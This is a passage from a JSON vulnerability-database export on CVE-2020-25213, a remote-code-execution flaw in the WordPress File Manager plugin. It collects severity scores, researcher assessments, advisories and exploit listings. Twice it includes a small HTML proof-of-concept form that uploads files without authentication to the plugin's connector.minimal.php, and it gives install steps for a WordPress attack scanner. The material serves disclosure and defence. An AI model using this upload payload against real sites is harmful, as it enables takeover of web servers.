"https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://plugins.trac.wordpress.org/changeset/2373068", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html"], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213"], "Miscellaneous": ["https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "https://wordpress.org/plugins/wp-file-manager#developers", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://plugins.trac.wordpress.org/changeset/2373068", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html"]}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2020-25213", "type": "attackerkb", "viewCount": 1, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["last_activity", "tags"], "edition": 5, "lastseen": "2021-05-06T15:18:39"}, {"bulletin": {"attackerkb": {"attackerValue": 5, "exploitability": 5}, "bulletinFamily": "info", "cvelist": ["CVE-2020-25213"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.\n\n \n**Recent assessments:** \n \n**space-r7** at November 10, 2020 3:10pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**wvu-r7** at September 29, 2020 8:28pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "enchantments": {"dependencies": {"modified": "2021-03-13T18:18:28", "references": [{"idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:160003"], "type": "packetstorm"}, {"idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"], "type": "rapid7blog"}, {"idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpexploit"}, {"idList": ["E-722"], "type": "dsquare"}, {"idList": ["CVE-2020-25213"], "type": "cve"}, {"idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2021-03-13T18:18:28", "rev": 2, "value": 5.6, "vector": "NONE"}}, "hash": "525469c53503ae7ab9dac441159f3a8f", "history": [], "href": "https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213", "id": "AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197", "immutableFields": [], "last_activity": null, "lastseen": "2021-03-13T18:18:28", "mitre_vector": {}, "modified": "2020-09-15T00:00:00", "objectVersion": "1.5", "published": "2020-09-09T00:00:00", "references": ["https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "https://wordpress.org/plugins/wp-file-manager#developers", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://plugins.trac.wordpress.org/changeset/2373068", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html"], "references_categories": {}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2020-25213", "type": "attackerkb", "viewCount": 0, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["references_categories"], "edition": 4, "lastseen": "2021-03-13T18:18:28"}], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "githubexploit", "idList": ["6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-07-20T20:13:13", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-07-20T20:13:13", "rev": 2}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213"], "Miscellaneous": ["https://wordpress.org/plugins/wp-file-manager#developers", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin", "https://plugins.trac.wordpress.org/changeset/2373068", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html"]}, "tags": ["easy_to_develop", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2020-11-10T15:10:00", "_object_type": "robots.models.attackerkb.AttackerKB", "_object_types": ["robots.models.attackerkb.AttackerKB", "robots.models.base.Bulletin"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "221ab2ce946e814b2b24224dd073a53c"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "description", "hash": "4be5b1bb426d67d5e45988ae1eae6d67"}, {"key": "href", "hash": "5ee76a18a6402acc9c84716efee54e94"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "fbbb237030b5b01a8d582548db2e5f9d"}, {"key": "published", "hash": "c75fb6b597902e8878f1273c1e36f810"}, {"key": "references", "hash": "546c565f15d39112a415245a0944ee70"}, {"key": "reporter", "hash": "5e5266bea17c39e5ee12abd5fcbf7c2b"}, {"key": "title", "hash": "405aaa07cd67ac97a21d1fa072e563ce"}, {"key": "type", "hash": "dbbc8fce9a59d0a898c44c4f99244f4a"}], "scheme": null}], "githubexploit": [{"id": "6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "vendorId": null, "hash": "51ce84ca6376d5a730ed59df4311924d", "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for CVE-2020-25213", "description": "# WP-file-manager expoit [CVE-2020-25213](https://nvd.nist.gov/v...", "published": "2020-10-10T17:50:01", "modified": "2021-10-09T08:00:50", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-11-02T13:12:02", "history": [], "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "githubexploit", "idList": ["21A5FEEE-9C4D-52D3-BCE6-7EABF0888631"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-11-02T13:12:02", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-11-02T13:12:02", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.githubexploit.GithubExploitBulletin", "_object_types": ["robots.models.githubexploit.GithubExploitBulletin", "robots.models.base.Bulletin"], "privateArea": 1}, {"id": "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "vendorId": null, "hash": "fa563192358045827799312a296c39b1", "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for ['CVE-2020-25213']", "description": "# WPKiller v1.0 \u2714\n\nWordpress Security Scanner, WPKiller Allows y...", "published": "2020-11-13T14:47:27", "modified": "2021-04-26T06:21:07", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-12-01T16:49:38", "history": [{"bulletin": {"id": "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "vendorId": "GITHUBEXPL:KAKAMBAND-WPKILLER", "hash": "a021bd359c4cd37edc43cccdfaabfff4", "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for CVE-2020-25213", "description": "# WPKiller v1.0 \u2714\n\nWordpress Security Scanner, WPKiller Allows you to search for vulnerabilities on the Wordpress site as well as scan Plugins and find Exploit customized versions and Plugins\n\n## Installation\n\nHow to install this tool?\n\n```bash\n$ git clone https://github.com/Dark-Grizzly/WPKiller\n$ cd WPKiller\n$ chmod +x wpkiller.py\n$ pip install -r requirements.txt\n$ python wpkiller.py\n```\n", "published": "2020-11-13T14:47:27", "modified": "2021-04-26T06:21:07", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://github.com/kakamband/WPKiller", "reporter": "kakamband", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-11-02T13:12:30", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [], "modified": "2021-11-02T13:12:30", "rev": 2}, "score": {"value": 1.6, "vector": "NONE", "modified": "2021-11-02T13:12:30", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-11-02T13:12:30", "differentElements": ["cvelist", "cvss", "cvss2", "cvss3", "title"], "edition": 1}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "githubexploit", "idList": ["6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-12-01T16:49:38", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-12-01T16:49:38", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.githubexploit.GithubExploitBulletin", "_object_types": ["robots.models.githubexploit.GithubExploitBulletin", "robots.models.base.Bulletin"], "privateArea": 1}], "checkpoint_advisories": [{"id": "CPAI-2020-0869", "vendorId": null, "hash": "783aa3b2035c03d918fbc21cb1fad82d", "type": "checkpoint_advisories", "bulletinFamily": "info", "title": "WordPress File Manager Plugin Remote Code Execution (CVE-2020-25213)", "description": "A remote code execution vulnerability exists in WordPress File Manager Plugin. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "published": "2020-09-29T00:00:00", "modified": "2020-09-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "Check Point Advisories", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-11-01T15:14:23", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "githubexploit", "idList": ["6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-11-01T15:14:23", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-11-01T15:14:23", "rev": 2}}, "objectVersion": "1.6", "severity": "Critical", "protected_by": ["Security Gateway R80", "Security Gateway R77", "Security Gateway R75"], "vulnerable_products": ["WordPress File Manager Plugin prior to 6.9"], "_object_type": "robots.models.checkpoint.CheckpointAdvisoryBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.checkpoint.CheckpointAdvisoryBulletin"]}], "wpexploit": [{"id": "WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9", "hash": "fda82d2d97fcfa61f237df6bdac44fb1", "type": "wpexploit", "bulletinFamily": "exploit", "title": "File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE", "description": "Seravo noticed multiple cases where WordPress sites were breached using 0-day in wp-file-manager (confirmed with v6.8, which was the latest version available in wordpress.org). File lib/php/connector.minimal.php can be by default opened directly, and this file loads lib/php/elFinderConnector.class.php which reads POST/GET variables, and then allows executing some internal features, like uploading files. PHP is allowed, thus this leads to unauthenticated arbitrary file upload and remote code execution. It seems that this vulnerability was originally discovered and published publicly on Twitter on August 26th (see references), and was later seen being exploited in the wild by Seravo.\n", "published": "2020-09-01T00:00:00", "modified": "2020-12-02T14:48:23", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Ville Korhonen", "references": ["https://blog.nintechnet.com/critical-zero-day-vulnerability-fixed-in-wordpress-file-manager-700000-installations/", "https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "https://blog.sucuri.net/2020/09/critical-vulnerability-file-manager-affecting-700k-wordpress-websites.html", "https://twitter.com/w4fz5uck5/status/1298402173554958338"], "cvelist": ["CVE-2020-25213"], "lastseen": "2021-02-15T22:21:15", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-02-15T22:21:15", "rev": 2}, "score": {"value": 4.3, "vector": "NONE", "modified": "2021-02-15T22:21:15", "rev": 2}}, "objectVersion": "1.5", "sourceData": "https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py\r\n\r\n<html>\r\n<body>\r\n <form method=\"POST\" enctype=\"multipart/form-data\" action=\"https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\">\r\n <input type=\"hidden\" name=\"cmd\" value=\"upload\"/>\r\n <input type=\"hidden\" name=\"target\" value=\"l1_Lw\"/>\r\n <input type=\"file\" name=\"upload[]\"/><br/><br/>\r\n <input type=\"submit\" value=\"Upload\"/>\r\n </form>\r\n</body>", "generation": 1, "_object_type": "robots.models.wpvulndb.WPExploitBulletin", "_object_types": ["robots.models.wpvulndb.WPExploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "wpvulndb": [{"id": "WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9", "hash": "a248ce83b81e9cddee6437d349921011", "type": "wpvulndb", "bulletinFamily": "software", "title": "File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE", "description": "Seravo noticed multiple cases where WordPress sites were breached using 0-day in wp-file-manager (confirmed with v6.8, which was the latest version available in wordpress.org). File lib/php/connector.minimal.php can be by default opened directly, and this file loads lib/php/elFinderConnector.class.php which reads POST/GET variables, and then allows executing some internal features, like uploading files. PHP is allowed, thus this leads to unauthenticated arbitrary file upload and remote code execution. It seems that this vulnerability was originally discovered and published publicly on Twitter on August 26th (see references), and was later seen being exploited in the wild by Seravo.\n\n### PoC\n\nhttps://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py \n \n\n", "published": "2020-09-01T00:00:00", "modified": "2020-12-02T14:48:23", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9", "reporter": "Ville Korhonen", "references": ["https://blog.nintechnet.com/critical-zero-day-vulnerability-fixed-in-wordpress-file-manager-700000-installations/", "https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "https://blog.sucuri.net/2020/09/critical-vulnerability-file-manager-affecting-700k-wordpress-websites.html", "https://twitter.com/w4fz5uck5/status/1298402173554958338"], "cvelist": ["CVE-2020-25213"], "lastseen": "2021-02-15T22:21:15", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "githubexploit", "idList": ["6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-02-15T22:21:15", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-02-15T22:21:15", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"version": "6.9", "operator": "lt", "name": "wp-file-manager"}], "exploit": "https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py\r\n\r\n<html>\r\n<body>\r\n <form method=\"POST\" enctype=\"multipart/form-data\" action=\"https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\">\r\n <input type=\"hidden\" name=\"cmd\" value=\"upload\"/>\r\n <input type=\"hidden\" name=\"target\" value=\"l1_Lw\"/>\r\n <input type=\"file\" name=\"upload[]\"/><br/><br/>\r\n <input type=\"submit\" value=\"Upload\"/>\r\n </form>\r\n</body>", "sourceData": "", "generation": 1, "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.wpvulndb.WPVulnDBBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "packetstorm": [{"id": "PACKETSTORM:160003", "hash": "473af4ef00309ffbdd6fc4a854cabc42", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution", "description": "", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "reporter": "Imran E. Dawoodjee", "references": [], "cvelist": ["CVE-2020-25213"], "lastseen": "2020-11-10T15:38:59", "history": [], "viewCount": 362, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "rapid7blog", "idList": 